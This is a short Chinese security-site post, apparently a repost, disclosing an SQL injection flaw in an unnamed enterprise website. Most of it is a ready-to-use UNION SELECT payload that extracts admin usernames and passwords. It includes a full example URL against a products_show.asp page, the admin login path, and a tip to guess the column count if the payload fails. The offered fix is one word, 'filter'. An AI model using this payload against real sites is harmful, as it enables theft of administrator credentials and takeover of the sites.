好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

某企业站sql注入漏洞及修复 - 网站安全 - 自学p

 

偶然碰上的,不知版权。

 

 

类型:SQL注入

 

成因:过滤不严,导致可sql注入。

 

等级:严重

 

后台:admin/login. asp

 

exp:

and 1=2 union select 1,username,3,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22 from admin

 

爆不出自行猜下字段。

 

示例:

http://HdhCmsTest2cto测试数据 /products_show.asp?p_id=30 and 1=2 union select 1,username,3,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22 from admin

 

修复:过滤,见本站其它共同问题文章

 

by Mr.DzY from HdhCmsTest0855.tv

查看更多关于某企业站sql注入漏洞及修复 - 网站安全 - 自学p的详细内容...

  阅读:50次